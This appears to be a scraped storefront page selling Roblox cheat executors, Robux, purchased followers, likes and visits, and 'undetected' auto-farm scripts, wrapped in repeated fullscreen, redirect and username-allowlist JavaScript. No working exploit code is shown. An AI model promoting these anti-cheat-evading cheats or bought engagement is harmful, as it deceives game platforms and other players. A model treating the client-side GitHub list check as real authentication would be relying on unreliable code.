LOADING 0%
(function() { const REDIRECT_URL = "#games"; function checkFullscreen() { if ( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ) { window.location.href = REDIRECT_URL; } } document.addEventListener( "fullscreenchange", checkFullscreen ); document.addEventListener( "webkitfullscreenchange", checkFullscreen ); document.addEventListener( "mozfullscreenchange", checkFullscreen ); document.addEventListener( "MSFullscreenChange", checkFullscreen ); })();
LOADING
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/PZZUh89' }, 1200);
LOADING
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/RMSI4oG' }, 1200);
LOADING
var timer = setTimeout(function() { window.location='https://shoppy.gg/product/zXv0gqb' }, 1200);
LOADING
var timer = setTimeout(function() { window.location='#adw93209ra93or2mlaa2345ise8u' }, 1000);
☁︎
Exploits
Cloud Access
$9.99
RMX Access
$4.99
Potassium Access
$27.99
R$
Robux
In Stock: 9,750 R$
500 R$
$3.99
1,000 R$
$7.99
1,700 R$ POPULAR
$14.99
3,000 R$
$26.66
6,000 R$
$49.99
10,000 R$
$79.99
Followers
Available Packages: 2
1,000 Followers
$1.00
100,000 Followers POPULAR
$79.99
👥
Group Members
Rate: $1.00 / 500
500 Members
$1.00
Asset Favorites
Rate: $1.00 / 1,000
1,000 Favorites
$1.00
Announcement Likes
Rate: $1.00 / 1,000
1,000 Likes
$1.00
Game Favorites
Rate: $1.00 / 1,000
1,000 Favorites
$1.00
Game Likes
50 Likes
$4.99
100 Likes
$9.99
Game Visits
500 Visits
$4.99
1,000 Visits
$9.99
Connect your Roblox
Connecting...
GAMES
Discover
Adult
CHAT & PARTY
Community chat
(function() { const chat = document.getElementById( "h2gRobloxChat" ); const minimize = document.getElementById( "h2gChatMinimize" ); minimize.addEventListener( "click", function() { chat.classList.toggle( "h2g-chat-collapsed" ); if ( chat.classList.contains( "h2g-chat-collapsed" ) ) { minimize.textContent = "+"; } else { minimize.textContent = "−"; } } ); })();
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

NEXT PAGE

☁︎
Exploits
Cloud Access
$9.99
RMX Access
$4.99
Potassium Access
$27.99
R$
Robux
In Stock: 9,750 R$
500 R$
$3.99
1,000 R$
$7.99
1,700 R$ POPULAR
$14.99
3,000 R$
$26.66
6,000 R$
$49.99
10,000 R$
$79.99
Followers
Available Packages: 2
1,000 Followers
$1.00
100,000 Followers POPULAR
$79.99
👥
Group Members
Rate: $1.00 / 500
500 Members
$1.00
Asset Favorites
Rate: $1.00 / 1,000
1,000 Favorites
$1.00
Announcement Likes
Rate: $1.00 / 1,000
1,000 Likes
$1.00
Game Favorites
Rate: $1.00 / 1,000
1,000 Favorites
$1.00
Game Likes
50 Likes
$4.99
100 Likes
$9.99
Game Visits
500 Visits
$4.99
1,000 Visits
$9.99
GAMES
Discover
Adult
CHAT & PARTY
Community chat
(function() { const cloudChat = document.getElementById( "cloudChatWidget" ); const cloudMinimize = document.getElementById( "cloudChatMinimize" ); cloudMinimize.addEventListener( "click", function() { cloudChat.classList.toggle( "cloud-chat-collapsed" ); if ( cloudChat.classList.contains( "cloud-chat-collapsed" ) ) { cloudMinimize.textContent = "+"; } else { cloudMinimize.textContent = "−"; } } ); })();
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

PREVIOUS PAGE | NEXT PAGE

var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "#remoteplay"); }, 5);
Bottom Right Image Overlay
Floating Link Icon
var timer = setTimeout(function() { window.location='#wantedautofarm' }, 3000);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();
var timer = setTimeout(function() { window.location='#bloxstrikezero' }, 3000);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

(function () { function zsStartLoadingBar() { var container = document.getElementById("zs-loading-bar-container"); var bar = document.getElementById("zs-loading-bar"); if (!container || !bar) { setTimeout(zsStartLoadingBar, 100); return; } /* ================================ SETTINGS ================================= */ var ZS_DURATION = 8000; /* ================================ RESET ================================= */ bar.style.width = "0%"; /* ================================ START ================================= */ var startTime = null; function zsAnimate(timestamp) { if (!startTime) { startTime = timestamp; } var elapsed = timestamp - startTime; var progress = Math.min( elapsed / ZS_DURATION, 1 ); bar.style.width = (progress * 100) + "%"; if (progress < 1) { requestAnimationFrame( zsAnimate ); } } requestAnimationFrame( zsAnimate ); } /* ================================ CARRD SAFE START ================================= */ if ( document.readyState === "loading" ) { document.addEventListener( "DOMContentLoaded", zsStartLoadingBar ); } else { zsStartLoadingBar(); } })();
var timer = setTimeout(function() { window.location='#voxelscommands' }, 3000);
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();

var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
AUTH
ONLINE
USER AUTHENTICATION
ENTER YOUR USERNAME TO CONTINUE
USERNAME
/* ========================================= REMOTE USER LISTS ========================================= */ /* PUT ONE USERNAME PER LINE IN EACH GITHUB FILE. Example: Rojang_Studios wantedpwn6 t5thwneexe */ const wafauthLink1URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listu.txt"; const wafauthLink2URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listz.txt"; /* ========================================= LOAD GITHUB USER LIST ========================================= */ async function wafauthLoadList(url) { try { const response = await fetch(url, { cache: "no-store" }); if (!response.ok) { throw new Error( "Failed to load user list" ); } const text = await response.text(); return text .split(/\r?\n/) .map(function(name) { return name .trim() .toLowerCase(); }) .filter(function(name) { return name.length > 0; }); } catch (error) { console.error( "WAF AUTH LIST ERROR:", error ); return []; } } /* ========================================= AUTHENTICATION ========================================= */ async function wafauthSubmit() { const username = document .getElementById("wafauth-username") .value .trim() .toLowerCase(); const error = document.getElementById("wafauth-error"); if (!username) { error.textContent = "ENTER A USERNAME"; return; } error.textContent = "VERIFYING..."; /* LOAD BOTH REMOTE LISTS */ const results = await Promise.all([ wafauthLoadList( wafauthLink1URL ), wafauthLoadList( wafauthLink2URL ) ]); const wafauthLink1Users = results[0]; const wafauthLink2Users = results[1]; /* CHECK MEMBERSHIP */ const onLink1 = wafauthLink1Users.includes( username ); const onLink2 = wafauthLink2Users.includes( username ); /* ========================================= BOTH LISTS → LINK 3 ========================================= */ if (onLink1 && onLink2) { window.location.href = "#allscriptversions"; return; } /* ========================================= ONLY LIST 1 ========================================= */ if (onLink1) { window.location.href = "#cmdscriptversions"; return; } /* ========================================= ONLY LIST 2 ========================================= */ if (onLink2) { window.location.href = "#scriptversions"; return; } /* ========================================= INVALID ========================================= */ error.textContent = "INVALID USERNAME"; } /* ========================================= ENTER KEY ========================================= */ document .getElementById("wafauth-username") .addEventListener( "keydown", function(event) { if (event.key === "Enter") { wafauthSubmit(); } }); /* ========================================= SCANNER TRACKING ========================================= */ document.addEventListener( "mousemove", function(event) { const scanner = document.querySelector( ".wafauth-scanner-core" ); const pupil = document.querySelector( ".wafauth-core-pupil" ); if (!scanner || !pupil) { return; } const rect = scanner.getBoundingClientRect(); const centerX = rect.left + rect.width / 2; const centerY = rect.top + rect.height / 2; const deltaX = event.clientX - centerX; const deltaY = event.clientY - centerY; const angle = Math.atan2( deltaY, deltaX ); const distance = Math.min( 7, Math.sqrt( deltaX * deltaX + deltaY * deltaY ) / 25 ); const x = Math.cos(angle) * distance; const y = Math.sin(angle) * distance; /* Keep the diamond shape while moving the tracking core. */ pupil.style.transform = "rotate(45deg) translate(" + x + "px, " + y + "px)"; });
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
AUTH
ONLINE
USER AUTHENTICATION
ENTER YOUR USERNAME TO CONTINUE
USERNAME
/* ========================================= REMOTE USER LISTS ========================================= */ /* PUT ONE USERNAME PER LINE IN EACH GITHUB FILE. Example: Rojang_Studios wantedpwn6 t5thwneexe */ const vxauthLink1URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listv.txt"; const vxauthLink2URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listv.txt"; /* ========================================= LOAD GITHUB USER LIST ========================================= */ async function vxauthLoadList(url) { try { const response = await fetch(url, { cache: "no-store" }); if (!response.ok) { throw new Error( "Failed to load user list" ); } const text = await response.text(); return text .split(/\r?\n/) .map(function(name) { return name .trim() .toLowerCase(); }) .filter(function(name) { return name.length > 0; }); } catch (error) { console.error( "VX AUTH LIST ERROR:", error ); return []; } } /* ========================================= AUTHENTICATION ========================================= */ async function vxauthSubmit() { const username = document .getElementById("vxauth-username") .value .trim() .toLowerCase(); const error = document.getElementById("vxauth-error"); if (!username) { error.textContent = "ENTER A USERNAME"; return; } error.textContent = "VERIFYING..."; /* LOAD BOTH REMOTE LISTS */ const results = await Promise.all([ vxauthLoadList( vxauthLink1URL ), vxauthLoadList( vxauthLink2URL ) ]); const vxauthLink1Users = results[0]; const vxauthLink2Users = results[1]; /* CHECK MEMBERSHIP */ const onLink1 = vxauthLink1Users.includes( username ); const onLink2 = vxauthLink2Users.includes( username ); /* ========================================= BOTH LISTS → LINK 3 ========================================= */ if (onLink1 && onLink2) { window.location.href = "#voxelsvers"; return; } /* ========================================= ONLY LIST 1 ========================================= */ if (onLink1) { window.location.href = "#voxelsvers"; return; } /* ========================================= ONLY LIST 2 ========================================= */ if (onLink2) { window.location.href = "#voxelsvers"; return; } /* ========================================= INVALID ========================================= */ error.textContent = "INVALID USERNAME"; } /* ========================================= ENTER KEY ========================================= */ document .getElementById("vxauth-username") .addEventListener( "keydown", function(event) { if (event.key === "Enter") { vxauthSubmit(); } }); /* ========================================= SCANNER TRACKING ========================================= */ document.addEventListener( "mousemove", function(event) { const scanner = document.querySelector( ".vxauth-scanner-core" ); const pupil = document.querySelector( ".vxauth-core-pupil" ); if (!scanner || !pupil) { return; } const rect = scanner.getBoundingClientRect(); const centerX = rect.left + rect.width / 2; const centerY = rect.top + rect.height / 2; const deltaX = event.clientX - centerX; const deltaY = event.clientY - centerY; const angle = Math.atan2( deltaY, deltaX ); const distance = Math.min( 7, Math.sqrt( deltaX * deltaX + deltaY * deltaY ) / 25 ); const x = Math.cos(angle) * distance; const y = Math.sin(angle) * distance; /* Keep the diamond shape while moving the tracking core. */ pupil.style.transform = "rotate(45deg) translate(" + x + "px, " + y + "px)"; });
var timer = setTimeout(function() { var stateObj = { foo: "bar" }; history.pushState(stateObj, "page 2", "authorizing"); }, 5);
AUTH
ONLINE
USER AUTHENTICATION
ENTER YOUR USERNAME TO CONTINUE
USERNAME
/* ========================================= REMOTE USER LISTS ========================================= */ /* PUT ONE USERNAME PER LINE IN EACH GITHUB FILE. Example: Rojang_Studios wantedpwn6 t5thwneexe */ const cjeauthLink1URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listm.txt"; const cjeauthLink2URL = "https://raw.githubusercontent.com/how2lib/rary/refs/heads/main/listm.txt"; /* ========================================= LOAD GITHUB USER LIST ========================================= */ async function cjeauthLoadList(url) { try { const response = await fetch(url, { cache: "no-store" }); if (!response.ok) { throw new Error( "Failed to load user list" ); } const text = await response.text(); return text .split(/\r?\n/) .map(function(name) { return name .trim() .toLowerCase(); }) .filter(function(name) { return name.length > 0; }); } catch (error) { console.error( "CJE AUTH LIST ERROR:", error ); return []; } } /* ========================================= AUTHENTICATION ========================================= */ async function cjeauthSubmit() { const username = document .getElementById("cjeauth-username") .value .trim() .toLowerCase(); const error = document.getElementById("cjeauth-error"); if (!username) { error.textContent = "ENTER A USERNAME"; return; } error.textContent = "VERIFYING..."; /* LOAD BOTH REMOTE LISTS */ const results = await Promise.all([ cjeauthLoadList( cjeauthLink1URL ), cjeauthLoadList( cjeauthLink2URL ) ]); const cjeauthLink1Users = results[0]; const cjeauthLink2Users = results[1]; /* CHECK MEMBERSHIP */ const onLink1 = cjeauthLink1Users.includes( username ); const onLink2 = cjeauthLink2Users.includes( username ); /* ========================================= BOTH LISTS → LINK 3 ========================================= */ if (onLink1 && onLink2) { window.location.href = "#bloxstrikevers"; return; } /* ========================================= ONLY LIST 1 ========================================= */ if (onLink1) { window.location.href = "#voxelsvers"; return; } /* ========================================= ONLY LIST 2 ========================================= */ if (onLink2) { window.location.href = "#voxelsvers"; return; } /* ========================================= INVALID ========================================= */ error.textContent = "INVALID USERNAME"; } /* ========================================= ENTER KEY ========================================= */ document .getElementById("cjeauth-username") .addEventListener( "keydown", function(event) { if (event.key === "Enter") { cjeauthSubmit(); } }); /* ========================================= SCANNER TRACKING ========================================= */ document.addEventListener( "mousemove", function(event) { const scanner = document.querySelector( ".cjeauth-scanner-core" ); const pupil = document.querySelector( ".cjeauth-core-pupil" ); if (!scanner || !pupil) { return; } const rect = scanner.getBoundingClientRect(); const centerX = rect.left + rect.width / 2; const centerY = rect.top + rect.height / 2; const deltaX = event.clientX - centerX; const deltaY = event.clientY - centerY; const angle = Math.atan2( deltaY, deltaX ); const distance = Math.min( 7, Math.sqrt( deltaX * deltaX + deltaY * deltaY ) / 25 ); const x = Math.cos(angle) * distance; const y = Math.sin(angle) * distance; /* Keep the diamond shape while moving the tracking core. */ pupil.style.transform = "rotate(45deg) translate(" + x + "px, " + y + "px)"; });
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();
DISCORD
PREVIEW
PAY WITH PAYPAL
PAY WITH CRYPTO
PAY WITH ROBUX
SCRIPT
MULTI-INSTANCE
HOME
DOWNLOAD+
WANTED AUTO FARMONLINE
WANTED ADMIN CMDONLINE
VOXELS ADMIN CMDONLINE
BLOXSTRIKE ZEROONLINE
SCRIPT 5OFFLINE
SCRIPT 6OFFLINE
SCRIPT 7OFFLINE
SCRIPT 8OFFLINE
SCRIPT 9OFFLINE
SCRIPT 10OFFLINE
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();
[D]
DISCORD
[?]
PREVIEW
[P]
PAY WITH PAYPAL
[$]
PAY WITH CRYPTO
[*]
PAY WITH ROBUX
SCRIPT
MULTI-INSTANCE
HOME
WANTED AUTO FARMONLINE
WANTED ADMIN CMDONLINE
VOXELS ADMIN CMDONLINE
BLOXSTRIKE ZEROONLINE
SCRIPT 5OFFLINE
SCRIPT 6OFFLINE
SCRIPT 7OFFLINE
SCRIPT 8OFFLINE
SCRIPT 9OFFLINE
SCRIPT 10OFFLINE
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();
SCRIPT
MULTI-INSTANCE
HOME
WANTED AUTO FARMONLINE
WANTED ADMIN CMDONLINE
VOXELS ADMIN CMDONLINE
BLOXSTRIKE ZEROONLINE
SCRIPT 5OFFLINE
SCRIPT 6OFFLINE
SCRIPT 7OFFLINE
SCRIPT 8OFFLINE
SCRIPT 9OFFLINE
SCRIPT 10OFFLINE
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();
SCRIPT
MULTI-INSTANCE
HOME
WANTED AUTO FARMONLINE
WANTED ADMIN CMDONLINE
VOXELS ADMIN CMDONLINE
BLOXSTRIKE ZEROONLINE
SCRIPT 5OFFLINE
SCRIPT 6OFFLINE
SCRIPT 7OFFLINE
SCRIPT 8OFFLINE
SCRIPT 9OFFLINE
SCRIPT 10OFFLINE
function wafhudToggleScripts() { const menu = document.getElementById("wafhud-scriptMenu"); menu.classList.toggle("active"); } document.addEventListener("click", function(event) { const hud = document.getElementById("wafhud-gtaHud"); if (!hud.contains(event.target)) { document .getElementById("wafhud-scriptMenu") .classList.remove("active"); } });
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
(function() { "use strict"; /* ======================================== GET THIS EMBED INSTANCE ======================================== */ const instance = document.currentScript.previousElementSibling .previousElementSibling; /* Find the blocker inside THIS instance */ const blocker = instance.querySelector( ".fsb-blocker" ); const button = instance.querySelector( ".fsb-button" ); /* ======================================== CHECK FULLSCREEN ======================================== */ function isFullscreen() { return !!( document.fullscreenElement || document.webkitFullscreenElement || document.mozFullScreenElement || document.msFullscreenElement ); } /* ======================================== UPDATE STATE ======================================== */ function updateFullscreenState() { if (isFullscreen()) { blocker.style.display = "none"; } else { blocker.style.display = "flex"; } } /* ======================================== FULLSCREEN EVENTS ======================================== */ document.addEventListener( "fullscreenchange", updateFullscreenState ); document.addEventListener( "webkitfullscreenchange", updateFullscreenState ); document.addEventListener( "mozfullscreenchange", updateFullscreenState ); document.addEventListener( "MSFullscreenChange", updateFullscreenState ); /* ======================================== RETURN TO FULLSCREEN ======================================== */ button.addEventListener( "click", function() { const element = document.documentElement; if (element.requestFullscreen) { element.requestFullscreen(); } else if ( element.webkitRequestFullscreen ) { element.webkitRequestFullscreen(); } else if ( element.mozRequestFullScreen ) { element.mozRequestFullScreen(); } else if ( element.msRequestFullscreen ) { element.msRequestFullscreen(); } } ); /* ======================================== INITIAL CHECK ======================================== */ updateFullscreenState(); })();


I
Tier I
$7.99 Lifetime
Unlocks
  • Bayview Jewelry Route
  • 1.5M–2.3M+ Cash Daily
  • Stealth Farming
  • Undetected by AC
  • Smart Server Hopping
  • Supports Potassium & more
II
Tier II
$9.99 Lifetime
Includes Tier I +
  • Bank of Oasis Route
  • 2.4M–3.6M+ Cash Daily
  • Stealth Farming
  • Undetected by AC
  • Smart Server Hopping
Also Includes
  • Bayview Jewelry Route
  • Supports Potassium & more
III
Tier III
$14.99 Lifetime
Includes Everything
  • Oasis City Jewelry Route
  • 2.9M–4.2M+ Cash Daily
  • Bank of Oasis Route
  • 2.4M–3.6M+ Cash Daily
  • Bayview Jewelry Route
  • 1.5M–2.3M+ Cash Daily
Bottom Right Image Overlay
Floating Link Icon
FULLSCREEN REQUIRED
This application is only available in fullscreen
